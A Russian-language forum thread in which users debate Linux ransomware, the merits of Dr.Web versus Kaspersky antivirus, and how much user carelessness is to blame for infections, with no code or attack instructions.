Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.Алзим писал(а):Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?
Re: О вирусах в Линуксе.
Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?
Re: О вирусах в Линуксе.
Вычищал после Касперского я неделю назад.Алзим писал(а):Я уверен в том, что Касперский, хоть он и паранойк и ресурсы системы потребляет, но вирусу ловить способен. А Вебер, ну если только какие-нибудь сделанные студентами-первокурсниками или ими самими.Barmalei писал(а): Вы в этом уверенны? Я много повидал антивирусов и вирусов и Доктор меньше всех пропустил.
Меня больше удивляет что есть люди тратящие деньги на всякие развлекательные ресурсы и не в малых количествах, а на защиту 500 рэ в год жаба душит.
Они сначала файлы зашифруют, а потом пишут, если я куплю лицуху вы поможете расшифровать?
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.
Последний раз редактировалось Barmalei 01 дек 2015, 17:17, всего редактировалось 1 раз.
Re: О вирусах в Линуксе.
slavyanix писал(а):ты мне поясни как ты собрался автоматом после скачки его запустить_)) браузер не запустит а скачкой в консоли редко кто занимается. и тогда надо создавать последовательность команд, хотя бы в одной строке.
Не, это ты мне поясни свою уверенность. Был apturl, например, а всякие java и сейчас есть. Это про браузер. По ссылке выше - в основном про сервер, но есть и "Атака на DHCP-клиент". Для домашнего десктопа не сильно актуально, да. Про прокладку И бита x у него нет. Это я к чему. http://forum.rosalab.ru/viewtopic.php?f ... 319#p41146 не панацея.slavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))
UPD Скачал *.tar.xz, распаковал (GUI) и install.sh имеет бит x. Правда по 2клику - то же окно. И да, ext4.
Re: О вирусах в Линуксе.
Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.
Re: О вирусах в Линуксе.
Это цитата с их сайта.Алзим писал(а):Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."

Re: О вирусах в Линуксе.
На вкус и цвет товарищей нет. Ни разу не приходилось чистить под Доктором.Алзим писал(а):Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.
В некоторой степени все же виноваты сами юзверы.
Re: О вирусах в Линуксе.
Вот на этой фразе давайте и остановимся.Barmalei писал(а): В некоторой степени все же виноваты сами юзверы.

Только, не в какой-то степени, а чаще всего, в самой основной степени.
У меня есть знакомый, которому никакой антивирус не поможет. Он устанавливает на комп всё, что на сайтах скажут. Похоже, он знает только одну кнопочку «ОК». И даже то, что он периодически переустанавливает Винду, это не помогает. Он продолжает упрямо соглашаться и ставить всё, что ему предлагают в сети.
Re: О вирусах в Линуксе.
Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.
Talk is cheap. Show me the code.
Linus Torvalds
Linus Torvalds
Re: О вирусах в Линуксе.
Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.Delles писал(а):Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.
- Andersen
- Сообщения: 53
- Зарегистрирован: 02 сен 2015, 17:16
- Откуда: Новосибирск
- Контактная информация:
Re: О вирусах в Линуксе
Какие антивирусы?Зачем?Для дополнительных тормозов и глюков?На виндовсе держите эти программы-там иногда бывает не лишними... 

Acer aspire 5920G;T9300 2,5Ggz;Plextor M6S 128gb;9500m GS.
Re: О вирусах в Линуксе.
Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.
Talk is cheap. Show me the code.
Linus Torvalds
Linus Torvalds
Re: О вирусах в Линуксе.
Не факт. Бывает и так. У админов трояны просто ничего не заражают, а воруют ФТП доступы и удаляются. А других потом шифруют.Delles писал(а):Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.
Пирамида некая.
Re: О вирусах в Линуксе.
Всяко админ отвечать должен, и другие тоже бэкап иметь. Я к тому, что ситуация в общем банальна. Если б не пиар Доктора Уеба.Barmalei писал(а):воруют ФТП доступы и удаляются. А других потом шифруют
Talk is cheap. Show me the code.
Linus Torvalds
Linus Torvalds